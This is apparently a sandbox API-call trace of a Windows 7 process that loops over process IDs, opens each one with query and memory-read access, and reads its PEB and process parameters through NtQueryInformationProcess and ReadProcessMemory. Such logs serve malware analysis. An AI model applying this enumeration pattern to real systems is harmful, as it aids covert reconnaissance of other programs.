[0564.297] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.297] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.313] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
[0564.313] CloseHandle (hObject=0x0) returned 0
[0564.314] _ui64tow (_Value=0x1b4, _Buffer="396", _Radix=10) returned="436"
[0564.317] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="436") returned 3
[0564.318] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.318] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.332] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b4) returned 0x0
[0564.332] CloseHandle (hObject=0x0) returned 0
[0564.333] _ui64tow (_Value=0x1d0, _Buffer="436", _Radix=10) returned="464"
[0564.336] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="464") returned 3
[0564.337] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.337] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.352] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0
[0564.352] CloseHandle (hObject=0x0) returned 0
[0564.353] _ui64tow (_Value=0x1dc, _Buffer="464", _Radix=10) returned="476"
[0564.356] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="476") returned 3
[0564.357] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.357] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.374] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0
[0564.374] CloseHandle (hObject=0x0) returned 0
[0564.375] _ui64tow (_Value=0x1e4, _Buffer="476", _Radix=10) returned="484"
[0564.378] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="484") returned 3
[0564.378] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.378] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.400] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0
[0564.400] CloseHandle (hObject=0x0) returned 0
[0564.401] _ui64tow (_Value=0x260, _Buffer="484", _Radix=10) returned="608"
[0564.404] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="608") returned 3
[0564.405] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.405] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.426] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x260) returned 0x0
[0564.426] CloseHandle (hObject=0x0) returned 0
[0564.429] _ui64tow (_Value=0x2a0, _Buffer="608", _Radix=10) returned="672"
[0564.433] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="672") returned 3
[0564.434] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.434] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.495] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a0) returned 0x0
[0564.495] CloseHandle (hObject=0x0) returned 0
[0564.496] _ui64tow (_Value=0x2d0, _Buffer="672", _Radix=10) returned="720"
[0564.500] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="720") returned 3
[0564.500] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.501] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.517] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2d0) returned 0x0
[0564.517] CloseHandle (hObject=0x0) returned 0
[0564.518] _ui64tow (_Value=0x348, _Buffer="720", _Radix=10) returned="840"
[0564.521] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="840") returned 3
[0564.522] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.522] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x348) returned 0x0
[0564.536] CloseHandle (hObject=0x0) returned 0
[0564.536] _ui64tow (_Value=0x370, _Buffer="840", _Radix=10) returned="880"
[0564.538] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="880") returned 3
[0564.538] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.539] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.550] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0
[0564.550] CloseHandle (hObject=0x0) returned 0
[0564.550] _ui64tow (_Value=0x3ac, _Buffer="880", _Radix=10) returned="940"
[0564.552] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="940") returned 3
[0564.553] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.553] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.564] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0
[0564.564] CloseHandle (hObject=0x0) returned 0
[0564.564] _ui64tow (_Value=0x120, _Buffer="940", _Radix=10) returned="288"
[0564.566] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="288") returned 3
[0564.567] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.567] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.580] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x120) returned 0x0
[0564.580] CloseHandle (hObject=0x0) returned 0
[0564.581] _ui64tow (_Value=0x164, _Buffer="288", _Radix=10) returned="356"
[0564.584] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="356") returned 3
[0564.585] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.585] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.602] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x164) returned 0x1e8
[0564.602] GetLastError () returned 0x0
[0564.602] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.602] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd6018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.603] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.603] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2227f0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.603] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x222688, lpBuffer=0xced2a0, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.604] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.605] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.605] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd6020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.605] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x221e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.605] malloc (_Size=0x3e) returned 0x3ed180
[0564.605] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2226c0, lpBuffer=0x3ed180, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3ed180*, lpNumberOfBytesRead=0x0) returned 1
[0564.606] free (_Block=0x3ed180)
[0564.607] CloseHandle (hObject=0x1e8) returned 1
[0564.607] _ui64tow (_Value=0x420, _Buffer="356", _Radix=10) returned="1056"
[0564.610] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1056") returned 4
[0564.611] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.611] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.624] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x420) returned 0x0
[0564.624] CloseHandle (hObject=0x0) returned 0
[0564.625] _ui64tow (_Value=0x484, _Buffer="1056", _Radix=10) returned="1156"
[0564.628] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1156") returned 4
[0564.629] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.629] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.640] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x484) returned 0x0
[0564.641] CloseHandle (hObject=0x0) returned 0
[0564.641] _ui64tow (_Value=0x4a4, _Buffer="1156", _Radix=10) returned="1188"
[0564.643] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1188") returned 4
[0564.644] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.644] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.659] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a4) returned 0x1e8
[0564.659] GetLastError () returned 0x0
[0564.659] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.659] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffde018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.659] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.659] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2a27c0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.659] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2a2688, lpBuffer=0xced2a0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.660] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.660] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.660] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffde020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.660] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2a1e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.661] malloc (_Size=0x20) returned 0x3efcf0
[0564.661] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2a26ca, lpBuffer=0x3efcf0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3efcf0*, lpNumberOfBytesRead=0x0) returned 1
[0564.662] free (_Block=0x3efcf0)
[0564.662] CloseHandle (hObject=0x1e8) returned 1
[0564.663] _ui64tow (_Value=0x4bc, _Buffer="1188", _Radix=10) returned="1212"
[0564.666] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1212") returned 4
[0564.666] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.666] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.682] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0
[0564.682] CloseHandle (hObject=0x0) returned 0
[0564.682] _ui64tow (_Value=0x4fc, _Buffer="1212", _Radix=10) returned="1276"
[0564.685] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1276") returned 4
[0564.686] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.686] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.701] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4fc) returned 0x1e8
[0564.701] GetLastError () returned 0x0
[0564.701] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.701] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd9018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.702] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.702] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2728b0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.702] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x272688, lpBuffer=0xced2a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.703] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.703] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.704] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd9020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.704] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x271e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.704] malloc (_Size=0x116) returned 0x401d40
[0564.704] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2726c8, lpBuffer=0x401d40, nSize=0x114, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x401d40*, lpNumberOfBytesRead=0x0) returned 1
[0564.705] free (_Block=0x401d40)
[0564.705] CloseHandle (hObject=0x1e8) returned 1
[0564.706] _ui64tow (_Value=0x640, _Buffer="1276", _Radix=10) returned="1600"
[0564.709] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1600") returned 4
[0564.710] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.710] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.725] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x640) returned 0x1e8
[0564.725] GetLastError () returned 0x0
[0564.725] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.725] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.725] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.725] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x112820, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.725] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x1126a6, lpBuffer=0xced2a0, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.726] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.728] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.728] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.728] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x111e90, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.728] malloc (_Size=0x32) returned 0x3ee140
[0564.728] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x1126d6, lpBuffer=0x3ee140, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3ee140*, lpNumberOfBytesRead=0x0) returned 1
[0564.729] free (_Block=0x3ee140)
[0564.730] CloseHandle (hObject=0x1e8) returned 1
[0564.730] _ui64tow (_Value=0x598, _Buffer="1600", _Radix=10) returned="1432"
[0564.733] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1432") returned 4
